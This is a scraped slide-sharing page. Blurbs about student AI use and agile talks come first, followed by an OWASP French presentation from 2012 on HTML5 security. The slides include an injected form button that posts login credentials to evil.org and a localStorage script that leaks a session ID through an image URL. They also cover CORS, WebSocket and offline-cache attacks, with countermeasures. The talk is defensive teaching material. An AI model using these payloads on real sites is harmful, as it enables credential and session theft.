L'enquête révèle que beaucoup d'étudiants jugent acceptable d'utiliser l'IA pour rédiger leurs devoirs, et même un quart des enseignants partagent cet avis. Cela pose des questions éthiques cruciales : copier-coller est-il tricher ? Utiliser l'IA sous supervision ou pour des traductions est-il acceptable ? La réponse n'est pas simple et nécessite un débat ouvert.
Propositions et Solutions
Pour encadrer ces usages, plusieurs solutions sont proposées. Plutôt que d'interdire l'IA, il est suggéré de fixer des règles pour une utilisation responsable. Des innovations pédagogiques peuvent également être explorées, comme la création de situations de concurrence professionnelle ou l'utilisation de détecteurs d'IA.
Conclusion
En conclusion, bien que l'étude présente des limites, elle souligne un besoin urgent de régulation. Une charte institutionnelle pourrait fournir un cadre pour une utilisation éthique.
Le Comptoir OCTO - Équipes infra et prod, ne ratez pas l'embarquement pour l'...OCTO Technology
par Claude Camus (Coach agile d'organisation @OCTO Technology) et Gilles Masy (Organizational Coach @OCTO Technology)
Les équipes infrastructure, sécurité, production, ou cloud, doivent consacrer du temps à la modernisation de leurs outils (automatisation, cloud, etc) et de leurs pratiques (DevOps, SRE, etc). Dans le même temps, elles doivent répondre à une avalanche croissante de demandes, tout en maintenant un niveau de qualité de service optimal.
Habitué des environnements développeurs, les transformations agiles négligent les particularités des équipes OPS. Lors de ce comptoir, nous vous partagerons notre proposition de valeur de l'agilité@OPS, qui embarquera vos équipes OPS en Classe Business (Agility), et leur fera dire : "nous ne reviendrons pas en arrière".
OCTO TALKS : 4 Tech Trends du Software Engineering.pdfOCTO Technology
En cette année 2024 qui s’annonce sous le signe de la complexité, avec :
- L’explosion de la Gen AI
-Un contexte socio-économique sous tensions
- De forts enjeux sur le Sustainable et la régulation IT
- Une archipélisation des lieux de travail post-Covid
Découvrez les Tech trends incontournables pour délivrer vos produits stratégiques.
Ouvrez la porte ou prenez un mur (Agile Tour Genève 2024)Laurent Speyser
(Conférence dessinée)
Vous êtes certainement à l’origine, ou impliqué, dans un changement au sein de votre organisation. Et peut être que cela ne se passe pas aussi bien qu’attendu…
Depuis plusieurs années, je fais régulièrement le constat de l’échec de l’adoption de l’Agilité, et plus globalement de grands changements, dans les organisations. Je vais tenter de vous expliquer pourquoi ils suscitent peu d'adhésion, peu d’engagement, et ils ne tiennent pas dans le temps.
Heureusement, il existe un autre chemin. Pour l'emprunter il s'agira de cultiver l'invitation, l'intelligence collective , la mécanique des jeux, les rites de passages, .... afin que l'agilité prenne racine.
Vous repartirez de cette conférence en ayant pris du recul sur le changement tel qu‘il est généralement opéré aujourd’hui, et en ayant découvert (ou redécouvert) le seul guide valable à suivre, à mon sens, pour un changement authentique, durable, et respectueux des individus! Et en bonus, 2 ou 3 trucs pratiques!
Ouvrez la porte ou prenez un mur (Agile Tour Genève 2024)
2011 02-07-html5-security-v1
1. The OWASP Foundation
http://www.owasp.org
et la Sécurité
ou comment les Poneys envahissent le Web 3.0...
Sébastien Gioria
French OWASP Leader
Global Education Committee
Paris - 7 Février 2012
Wednesday, February 8, 12
2. Agenda
•Un peu d’histoire
•HTML5 pour les nuls en 4mn 2s
•Nouvelles attaques et protections ?
•Références
2
Wednesday, February 8, 12
3. Back to the past
1995 1998 2000 2005 2012
HTML 2.0 HTML 4.0 HTML 5 ?
CSS 2 CSS 3
JavaScript
la DOM XmlHttpRequest
3
Wednesday, February 8, 12
6. 4mn 2s
Nouvelles balises
• On n’est pas la pour parler de peinture...
Nouvelles APIs
• WebSocket
• WebMessaging
• IndexedDB
• OffLine Web Application
• WebStorage (votre nouveau DropBox ? ...)
• Cross Origin Ressource Sharing (déja rien que le
nom est intéressant...)
6
Wednesday, February 8, 12
7. 4mn 2s
WebSocket : Permet d’effectuer des connexions
persistantes et bi-directionnelles
• mécanisme de “Push” possible
• interface en cours de finalisation/
spécifications
• nécessite un serveur “compatible”
• API minimaliste (send, receive via event)
• http://www.w3.org/TR/websockets/
7
Wednesday, February 8, 12
8. 4mn 2s
WebMessaging : communication inter-documents
HTML
• via la méthode window.postMessage();
• pas de garantie de contenu inoffensif (ie;
pas de filtre de type anti-XSS ....)
• vérification de l’origine a la charge de
l’application receptrice.
• il est possible de transporter du JSON :)
• http://www.w3.org/TR/webmessaging/
8
Wednesday, February 8, 12
9. 4mn 2s
IndexedDB; la Web SQL Database...
•API synchrone et asynchrone
•pensée pour JavaScript; stockage
d’objets
•http://www.w3.org/TR/IndexedDB/
9
Wednesday, February 8, 12
10. 4mn 2s
Offline Web Applications: possibilité
d’exécuter tout ou partie des applications
même déconnecté.
• via navigator.onLine
• mise en cache des données
nécessaires(HTML, CSS, JavaScript...)
• http://www.w3.org/TR/html5/
offline.html
10
Wednesday, February 8, 12
11. 4mn 2s
WebStorage : donne la capacité au navigateur
de stocker jusqu’a 5Mo à 10Mo de données
•deux type de stockage : local ou de
session
•possibilité de stocker des objets JSON
•possibilité de stocker de manière
régulière
•http://www.w3.org/TR/webstorage/
11
Wednesday, February 8, 12
13. OWASP Top Ten 2010
A3:
Mauvaise
ges-on
A4:Référence
directe
A2:
Cross
Site
A1:
Injec-on des
sessions
et
de
non
sécurisée
à
un
Scrip-ng
(XSS)
l’authen-fica-on objet
A8:
Mauvaise
A5:
Cross
Site
Request
A6:
Mauvaise
A7:
Mauvais
stockage
restric-on
d’accès
à
Forgery
(CSRF)
configura-on
sécurité cryptographique
une
URL
A9:
Protec-on
A10:
Redirec-ons
et
insuffisante
lors
du
transferts
non
validés
transport
des
données
http://www.owasp.org/index.php/Top_10
Wednesday, February 8, 12
14. Falsification de Forms
Il est possible de contrôler une Forms en
dehors de l’élément “forms”
<form id=“myform” action=“basic.php” >
<input type=“text” name=“user” value=“…” />
</form>
<input form=“myform” type=“submit” name=“…”
value=“Advanced Version”/>
14
Wednesday, February 8, 12
15. Falsification Forms
<form id=“login” action=“login.php” >
<input type=“text” name=“username” />
<input type=“password” name=“password” />
<input type=“submit” name=“…” value=“Login” />
</form>
Si on arrive à injecter ce code
New VIP section of the site is open!
<input form=“login” type=“submit”
name=“Enter VIP section”
formaction=“http://evil.org/login.php” />
Automatiquement, evil.org dispose
des éléments et la Forms initiale est
appelée
15
Wednesday, February 8, 12
16. Protocol/content Handlers
Il est possible d’enregistrer des handlers de
protocole ou de type de fichiers personalisés
• sms://
• application/pdf
Il est possible (mais pas recommandé)
de changer les handlers standards
(dépend des navigateurs)
Il n’est pas obligatoire de demander à
l’utilisateur son autorisation
16
Wednesday, February 8, 12
17. Cross Origin Resource Sharing 1/4
XHR ne peut dialoguer qu’avec le site Web
originaire du JavaScript.
17
Wednesday, February 8, 12
18. Cross Origin Resource Sharing 1/4
XHR ne peut dialoguer qu’avec le site Web
originaire du JavaScript.
17
Wednesday, February 8, 12
19. Cross Origin Resource Sharing 1/4
XHR ne peut dialoguer qu’avec le site Web
originaire du JavaScript.
Mais c’etait sans compter les
17
Wednesday, February 8, 12
20. Cross Origin Resource Sharing 1/4
XHR ne peut dialoguer qu’avec le site Web
originaire du JavaScript.
Mais c’etait sans compter les
HTTP/1.1 200 OK
Content-Type: text/html
Access-Control-Allow-Origin: http://internal.example.com
17
Wednesday, February 8, 12
21. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
22. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
23. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
24. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
25. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
26. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
GET / HTTP/1.1
intranet
18
Wednesday, February 8, 12
27. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
GET / HTTP/1.1
intranet
18
Wednesday, February 8, 12
28. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
29. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
HTTP/1.1 200 Ok
<script>XMLHttpRequest...
intranet
18
Wednesday, February 8, 12
30. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
HTTP/1.1 200 Ok
<script>XMLHttpRequest...
intranet
18
Wednesday, February 8, 12
31. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
32. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
XMLHTTPRequest
intranet
18
Wednesday, February 8, 12
33. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
XMLHTTPRequest
intranet
18
Wednesday, February 8, 12
34. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
35. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
Access-Control-Allow-Origin: *
HTTP/1.1 200 Ok
intranet
18
Wednesday, February 8, 12
36. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
Access-Control-Allow-Origin: *
HTTP/1.1 200 Ok
intranet
18
Wednesday, February 8, 12
37. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
Access-Control-Allow-Origin: *
HTTP/1.1 200 Ok
intranet
18
Wednesday, February 8, 12
38. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
Access-Control-Allow-Origin: *
HTTP/1.1 200 Ok
intranet
18
Wednesday, February 8, 12
39. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
intranet
18
Wednesday, February 8, 12
40. Cross Origin Resource Sharing 2/4
Bypass des contrôles d’accès
poc.ckers.fr
POST /endpoint HTTP/1.1
.....(contenu de la page interne)
intranet
18
Wednesday, February 8, 12
62. Cross Origin Resource Sharing 4/4
Contre-mesures :
•Restriction du domaine
•Ne pas faire confiance à l’entete; elle
peut être modifiée par l’attaquant.
•Mettre en place des contre-mesures
réseaux (pour les DDOS)
20
Wednesday, February 8, 12
63. WebStorage
Pas de contrôle de la part de l’utilisateur
sur ce qui est stocké/accéder
L’injection de Javascript peut bypasser la
limitation du contrôle d’accès.
➡Vol de Sessions
➡Vol de données sensibles
➡Tracking d’utilisateurs
21
Wednesday, February 8, 12
64. WebStorage
Vol de Sessions; juste un peu plus
compliqué. :
<script>
document.write("<img
src='http://www.mysite.com?sessionID="+localStorage.getItem('SessionID')+"'>");
</script>
le flag HTTPOnly des cookies ne fonctionne
pas sur les localStorage !
22
Wednesday, February 8, 12
65. WebStorage
Tracking User
Les localStorage ne sont pas forcément
effacer lorsqu’on efface l’historique
Il est donc possible de créer des
identifiants (de type cookies) persistants
permettant de suivre l’utilisateur
23
Wednesday, February 8, 12
66. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
24
Wednesday, February 8, 12
67. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
24
Wednesday, February 8, 12
68. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
24
Wednesday, February 8, 12
69. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
24
Wednesday, February 8, 12
70. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
24
Wednesday, February 8, 12
71. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
24
Wednesday, February 8, 12
72. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
24
Wednesday, February 8, 12
73. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
24
Wednesday, February 8, 12
74. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
24
Wednesday, February 8, 12
75. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
24
Wednesday, February 8, 12
76. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocl Handshake
24
Wednesday, February 8, 12
77. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocl Handshake
24
Wednesday, February 8, 12
78. WebSocket API :)
Possible entre différents domaines
Permettrai de réduire la taille du contenu
transporté ?
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocl Handshake
Tunnel TCP Full Duplex
24
Wednesday, February 8, 12
79. Websocket Menaces
Parmi les attaques possible, certaines sont
triviales:
•Shell Distant
•Botnet Web
• via un XSS ou tout simplement en se
connectant à un site Web.
•Port scanning...
25
Wednesday, February 8, 12
80. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
26
Wednesday, February 8, 12
81. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
26
Wednesday, February 8, 12
82. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
26
Wednesday, February 8, 12
83. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
26
Wednesday, February 8, 12
84. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
26
Wednesday, February 8, 12
85. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
26
Wednesday, February 8, 12
86. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
26
Wednesday, February 8, 12
87. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
26
Wednesday, February 8, 12
88. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
26
Wednesday, February 8, 12
89. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
26
Wednesday, February 8, 12
90. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
26
Wednesday, February 8, 12
91. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
26
Wednesday, February 8, 12
92. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
26
Wednesday, February 8, 12
93. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
GET / HTTP/1.1
Host: some.host.com
26
Wednesday, February 8, 12
94. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
GET / HTTP/1.1
Host: some.host.com
26
Wednesday, February 8, 12
95. WebSocket
•Empoisonnement de cache de proxy
Proxy Transparent
GET / HTTP/1.1
HTTP/1.1 200 Ok
Upgrade WebSocket
WebSocket Protocol Handshake
GET / HTTP/1.1
Host: some.host.com
HTTP/1.1 200 Ok
Contenu falsifié
26
Wednesday, February 8, 12
96. OffLine Web Application
<!DOCTYPE HTML>
<html manifest="/cache.manifest">
<body>
•Possibilité d’avoir des attaques de Type
APT ?
•Possibilité de pollution des caches de
navigateurs (via un point d’accès
malveillant); meme du SSL
27
Wednesday, February 8, 12
97. WebMessage
•Possibilité de perte de données sensibles
(si envoyées à une “mauvaise iframe”)
Page du site “interne”
postMessage()
<iframe src=”outside.control”
28
Wednesday, February 8, 12
98. API Geolocation
Possibilité de découvrir le lieu ou se trouve
l’utilisateur (sous reserve d’avoir un
GPS, ou autre système).
Perte de données de vie privée...
29
Wednesday, February 8, 12
99. Bac a sable des iframes
<iframe sandbox="....."
src="http://monsite.com/index.html"></iframe>
Par défaut si rien n’est précisé :
•Les formulaires, scripts et plug-ins sont désactivés.
•Pas d’accès aux éléments stockés en local (cookies,
sessionStorage, localStorage).
•Par d’AJAX
•Les liens ne peuvent cibler d’autres frames
•Le contenu est considéré externe (pas d’accès à la
DOM)
30
Wednesday, February 8, 12
100. Bac a sable des iframes
Lever les restrictions :
•allow-same-origin : autorise le contenu a être traité comme de
la même origine est pas externe
•allow-top-navigation : l’iframe peut accéder à la navigation de
niveau supérieur
•allow-forms : autorise les formulaires
•allow- scripts : les scripts (hors popup) sont autorisés
Les navigateurs ne supportent pas
tous ces éléments !
31
Wednesday, February 8, 12
101. Autres points importants
Les longs traitements en JavaScript
“plantaient” les navigateurs.
Les WebWorkers permettent de lancer des
JavaScript en tache de fond
DDOS avec CORS & WebWorkers
Calculs distribués (cf Ravan)
32
Wednesday, February 8, 12
102. Autres Points importants
CSS3 introduit de nouvelles capacités à
injecter du code JavaScript
Nouvelles capacités au ClickJacking
33
Wednesday, February 8, 12
103. Conclusion
Plein de nouvelles API interessantes pour
le développeur
L’ouverture se fait au détriment de la
sécurité....
Une surface d’attaque accrue
La belle part au JavaScript (qui peut
s’executer sans consentement
utilisateur)
34
Wednesday, February 8, 12
105. Quelques Sites a suivre..
http://www.w3.org/TR/html5/ : le standard
https://www.owasp.org/index.php/
HTML5_Security_Cheat_Sheet
http://www.caniuse.com : liste des différents
supports d’API par navigateur
http://www.html5test.com : le support de VOTRE
navigateur vis a vis de la norme.
36
Wednesday, February 8, 12